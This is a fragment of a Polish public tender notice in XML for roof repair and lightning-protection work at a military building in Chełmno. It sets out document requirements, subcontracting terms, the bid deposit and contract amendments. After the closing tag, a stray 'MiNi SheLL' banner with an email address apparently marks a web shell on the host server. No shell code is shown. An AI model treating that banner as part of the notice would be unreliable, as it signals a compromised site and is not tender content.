2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, 
że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem 
w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu;
4)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Ustawy;
5)	oświadczenie Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne.
2.	Dokumenty składane przez Wykonawców w przypadkach:
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 (pkt. 1 – 4) :
a)	pkt 1 – składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 Ustawy i ust. 5 pkt. 1 p.z.p.;
b)	pkt 2-3 – składa dokument, że nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)	pkt 4 – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2)	Dokumenty, o których mowa w pkt. a) i c), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w postępowaniu. Dokument, o którym mowa w pkt. b), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu.
3)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Przepis ust. 2 pkt. 2 stosuje się.
4)	Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w ust. 1 pkt 1), składa dokument, o którym mowa w ust. 2 pkt. 1a) w zakresie określonym 
w art. 24 ust. 1 pkt 14 i 21 Ustawy. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby. Przepis ust. 2 pkt. 2 zdanie pierwsze stosuje się.
5)	W przypadku, wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.

6.	Dokumenty wymagane w ust. 1 i 2 winny być aktualne na dzień ich składania Zamawiającemu.
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>1.	Wykonawca, którego oferta w wyniku wstępnej oceny okaże się najkorzystniejsza przedłoży 
w terminie nie krótszym niż 5 dni od daty otrzymanego wezwania od Zamawiającego, dokumenty 
i oświadczenia potwierdzające spełnienie warunków udziału w zakresie zdolności zawodowej 
(art. 22 ust. 1 pkt. 2 Ustawy):
1)	wykaz robót budowlanych (według treści Załącznika nr 7 do SIWZ) wykonanych w okresie pięciu lat przed upłynięciem terminu do składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz z załączeniem dowodów potwierdzających, że roboty zostały wykonane 
w sposób należyty oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny 
o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.
Zamawiający wymaga wykazania się przez Wykonawcę realizacje robót budowlanych określonych w Rozdziale VI ust. 1 pkt. 2a SIWZ.
Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych dokumentów jak powyżej, Zamawiający dopuszcza złożenie przez Wykonawcę innych odpowiednich dokumentów w celu potwierdzenia spełnienia warunku udziału w postępowaniu. 
Jeżeli wykaz, oświadczenia lub inne złożone przez Wykonawcę dokumenty będą budzić wątpliwości Zamawiającego, może on zwrócić się do właściwego podmiotu, na rzecz, którego usługi były wykonane lub są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie.
2)	oświadczenie o dysponowaniu kierownikami robót i projektantem (wykaz osób) celem wykazania spełnienia warunku w zakresie zdolności zawodowej (według treści Załącznika nr 8 do SIWZ) skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Zamawiający wymaga wykazania osób określonych przez Zamawiającego w Rozdziale VI ust. 1 
pkt. 2b SIWZ.
</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>1.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy – art. 36a ust. 1 ustawy PZP. 
W przypadku gdy Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy winien 
w oświadczeniu składanym wraz z ofertą (art. 25a ust.1 p.z.p.) -_wskazać części zamówienia, których wykonanie zamierza powierzyć podwykonawcom (art. 36b ust 1 p.z.p.) oraz firmy tych podwykonawców. 
Zamawiający żąda przed przystąpieniem do wykonania zamówienia (o ile są już znane) nazwy lub imiona 
i nazwiska oraz dane kontaktowe podwykonawców i osób do kontaktu z nimi zaangażowanych w roboty budowlane.
Jeżeli powierzenie podwykonawcy wykonania części zamówienia na roboty budowlane następuje w trakcie jego realizacji, Wykonawca na żądanie Zamawiającego przedstawia oświadczenie, o którym mowa 
w art. 25a ust. 1, lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy.  Jeżeli zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, Wykonawca obowiązany jest zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy.
W przypadku, gdy Wykonawca nie wskaże części zamówienia, której wykonanie powierzy podwykonawcom Zamawiający  uzna, że całość zamówienia Wykonawca wykona samodzielnie.
Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie zamówienia.
Zamawiający nie wymaga osobistego wykonania przez Wykonawcę kluczowych części zamówienia.
Wykonawca wskazuje dane w zakresie, o którym mowa powyżej w treści oświadczenia.
2.	Zamawiający nie wymaga od Wykonawcy na etapie składania ofert do przedkładania umów lub ich projektów z podwykonawcami. 
W przypadku gdy mimo treści  ust. 2 SIWZ Wykonawca przedłoży taką umowę lub projekt Zamawiający zastrzega, iż obowiązki w zakresie określonym art. 143b – 143d, w szczególności w zakresie terminów związanych z wniesieniem sprzeciwu lub zastrzeżeń, akceptacji tego rodzaju umów będą podjęte
 i liczone od dnia przekazania informacji o wyborze oferty najkorzystniejszej.
3.	Obowiązek przedłożenia przez Wykonawcę, podwykonawcę, dalszych podwykonawców Zamawiającemu,
z zastrzeżeniem OWU, umów z podwykonawcami lub ich projektów dotyczyć będzie umów, projektów na dostawy i usługi wykonywanych w ramach robót budowlanych o wartości wyższej niż 0,5% wartości umowy zawartej z Wykonawcą w sprawie zamówienia publicznego.
Zamawiający zastrzega wobec art. 143b w zw. z art. 36 ust. 2 pkt. 11 b) Ustawy PZP, iż powyższe nie dotyczy umów o wartości mniejszej niż 50.000 zł w przedmiocie związanym z podwykonawstwem na utylizację odpadów, transport i przechowywanie odpadów oraz umów o dzieło i zleceń osobom fizycznym nie będącymi przedsiębiorcami. W przypadku, gdy mimo tej informacji Wykonawca przedłoży taką umowę lub projekt Zamawiający zastrzega, iż w związku z niewymagalnością takich dokumentów, podwykonawca Wykonawcy, z którym Zamawiający zawrze umowę w sprawie zamówienia publicznego nie będzie mógł domagać się zapłaty od Zamawiającego tytułem wykonania usług lub/i dostaw w ramach zamówienia.
4.	Zamawiający na podstawie art. 36 ust. 2 pkt. 11a) wskazuje, iż umowy na podwykonawstwo 
z podwykonawcą i dalszym podwykonawcą (jeżeli Wykonawca takowe przewiduje) winny zawierać co najmniej następujące elementy: 
1)	zakres zamówienia powierzony podwykonawcy (w powierzonej części nie wykraczający poza zakres przedmiotu umowy);
2)	termin wykonania zakresu zamówienia przez podwykonawcę (jako gwarantujący realizację całości zamówienia przez Wykonawcę w terminie określonym umową Stron)
3)	kwotę wynagrodzenia z zastrzeżeniem, iż kwota ta co do zasady nie może być wyższa, niż wartość tego zakresu robót wynikająca z oferty Wykonawcy; 
4)	termin zapłaty - wynagrodzenia dla podwykonawcy lub dalszego podwykonawcy, przewidziany w umowie o podwykonawstwo, który nie może być dłuższy niż 30 dni od dnia doręczenia wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku, potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy roboty budowlanej, dostawy, usługi (art. 143b ust. 2 Ustawy PZP). Niespełnienie powyższych wymagań spowoduje zgłoszenie przez Zamawiającego odpowiednio zastrzeżeń lub sprzeciwu (art. 36 ust. 2 pkt. 11 ustawy PZP).
Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie zamówienia.
Zamawiający nie wymaga osobistego wykonania przez Wykonawcę kluczowych części zamówienia.
5.	Każdy Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany do złożenia wraz z ofertą do upływu terminu składania ofert następujących dokumentów:
1)	Kosztorys ofertowy – według wzoru określonego Załącznikiem nr  2 do SIWZ;
2)	Oświadczenie, o którym mowa w art. 25a ust. 1 p.z.p. o braku podstaw do wykluczenia oraz 
o spełnieniu warunków udziału w postępowaniu  – według wzoru określonego Załącznikiem nr 4 do SIWZ.
Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.
W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego oświadczenie 
o braku podstaw do wykluczenia i spełnieniu warunków udziału w postępowaniu składa każdy 
z Wykonawców ubiegających się o zamówienie.
Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zamieszcza w oświadczeniu, 
o którym mowa, informacje o podwykonawcach.
3)	Oświadczenie stanowiące treść oferty - potwierdzające spełnienie wymagań w zakresie zatrudnienia osób – według wzoru określonego Załącznikiem nr 6 do SIWZ.
4)	Pełnomocnictwo do działania innych/ej osób/y w imieniu Wykonawcy w oryginale lub notarialnie poświadczonej kopii pełnomocnictwa – o ile dotyczy.
5)	Zobowiązanie innego podmiotu jeżeli Wykonawca sam nie spełnia i nie jest w stanie spełnić warunku udziału w postępowaniu w zakresie zdolności zawodowej i w tym zakresie polega na innym podmiocie – o ile dotyczy – Rozdział VI ust. 2 SIWZ. 
</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>1.	Zamawiający żąda od Wykonawców składających ofertę wniesienia wadium przed upływem terminu składania ofert w wysokości 11.000,00 zł.
2.	Wykonawca zobowiązany jest wnieść wadium na cały okres związania ofertą.
3.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy zostanie odrzucona na podstawie art. 89 ust. 1 pkt. 7b Ustawy.
Oferta Wykonawcy, który odmówi wyrażenia zgody na przedłużenie terminu związania ofertą podlega odrzuceniu z postępowania na podstawie art. 89 ust. 1 pkt. 7a Ustawy.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r., poz. 359).

5.	W przypadku wniesienia wadium w formie określonej w  ust. 4 pkt. 2-5, 
z jej treści powinno wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie zgłoszone przez Zamawiającego (w terminie związania ofertą) zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Ustawy. 
6.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 

NBP ODDZIAŁ OKRĘGOWY W BYDGOSZCZY       
25 1010 1078 0105 5913 9120 0000

W przypadku, gdy Wykonawca załącza do składanej oferty dowód wpłaty wadium wówczas Zamawiający zaleca złożenie go w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub inną/e osobę/y upoważnioną/e do reprezentowania Wykonawcy. 
Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych 
na rachunku bankowym Zamawiającego, o którym mowa, przed upływem terminu składania ofert 
(tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).
7.	Wadium wnoszone w poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w ust. 4 pkt 2-5 , należy:
zdeponować w formie oryginału w kasie Zamawiającego – budynek nr 20 pokój nr 1 przed upływem terminu do składania ofert (Zamawiający dopuszcza przesłanie oryginału dokumentu za pośrednictwem poczty, dokument należy przesłać na adres Zamawiającego  z dopiskiem „KASA” – numer sprawy), natomiast kopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę lub inną/e osobę/y upoważnioną/e do reprezentowania Wykonawcy zaleca się  załączyć do składanej oferty (Kasa czynna jest: od poniedziałku do piątku w godzinach 9.00 –13.00).
lub
dołączyć oryginał dokumentu do oferty.

8.	Przy wnoszeniu wadium Wykonawca winien podać: nazwę przedmiotu zamówienia, numer sprawy, oraz numer rachunku (dotyczy formy pieniężnej), na który należy zwrócić wadium.
9.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy.
10.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 Ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy (ZNWU).
12.	Zamawiający zwraca niezwłocznie wadium, na pisemny wniosek Wykonawcy (osoby upoważnionej do występowania w imieniu Wykonawcy), który wycofał ofertę przed upływem terminu składania ofert.
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art. 26 ust. 3 i 3a Ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
14.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
15.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa PZP (art. 46 oraz art. 148 Ustawy).
</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>1.	Zamawiający zgodnie z art. 144 ust. 1 pkt. 1 Ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, 
w następującym zakresie:
1)	udziału w treści oferty lub zmiany podwykonawcy na innego – w przypadku, kiedy Wykonawca określi go co do tożsamości w ofercie, a nowy podwykonawca spełni wymagania dla fachowego wykonania powierzanych mu czynności lub części zamówienia zgodnie z umową (np. oświadczenie Wykonawcy, podwykonawcy);
2)	zmiany podwykonawcy na innego lub rezygnacji z podwykonawcy uczestniczącego w realizacji umowy w sytuacji gdy podwykonawca na etapie składania ofert wykazał podwykonawcę jako podmiot, na którego zasoby wykonawca powołał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. Wykonawca w tej sytuacji będzie zobowiązany udowodnić  Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagane w trakcie postępowania 
o udzielenie zamówienia;
3)	zmiany zakresu podwykonawstwa;
4)	zmiany osób kierujących robotami po stronie Wykonawcy, pod warunkiem, że osoba ta jest uprawniona do kierowania robotami w zakresie odpowiednio:
ogólnobudowlanym w specjalności konstrukcyjno-budowlanej, minimum w ograniczonym zakresie, należącym w sposób czynny do Izby Inżynierów Budownictwa;
sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, minimum w ograniczonym zakresie, należącym w sposób czynny do Izby Inżynierów Budownictwa,
projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych bez ograniczeń, należącym w sposób czynny do Izby Inżynierów Budownictwa,
5)	zmiany osób zatrudnionych na umowę o pracę wykazanych przez Wykonawcę, o których mowa 
w § 2 ust. 12 umowy pod warunkiem, iż wymagania określone w zakresie zatrudnienia osób zostaną spełnione (art. 29 ust. 3a p.z.p.). 
Zmiany jak powyżej (z wyłączeniem pkt. 5) wymagają zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem (w zakresie pkt. 1 Wykonawca będzie zobowiązany załączyć dodatkowo oświadczenie podwykonawcy potwierdzające brak podstaw do wykluczenia wobec  tego podwykonawcy – art. 36ba ust.1). W przypadku wystąpienia zmiany, o której mowa w pkt. 4 wystarczającym będzie zgłoszenie pisemne Wykonawcy
2.	Zamawiający przewiduje również możliwość wprowadzenia zmian do treści zawartej umowy 
w okolicznościach i przypadkach określonych w art. 144 ust. 1 pkt 2, pkt. 3, pkt. 5, pkt. 6 Ustawy.
</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena oferty </kryt_0><kryt_0p>60</kryt_0p><czy_aukcja /><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>21/02/2017</data_skl><godz_skl>09:30</godz_skl><miejsce></miejsce><IV_4_4_jezyki>PL</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6>Kopertę należy opisać hasłem: 
OFERTA PRZETARGOWA: 
„REMONT DACHU WRAZ Z OPRACOWANIEM PROJEKTU NA WYMIANĘ INSTALACJI 
ODGROMOWEJ I JEJ WYKONANIEM - BUDYNEK NR 4 W KOMPLEKSIE WOJSKOWYM 
PRZY AL. 3-GO MAJA 2-4 W CHEŁMNIE” – spr. nr 5/2017
nie otwierać do dnia 21.02.2017 r. do godziny 10.00”

Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu  nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi).
Brak prawidłowego oznakowania może spowodować uznanie przez Zamawiającego otrzymania zwykłej korespondencji nie stanowiącej oferty w postępowaniu.
</IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com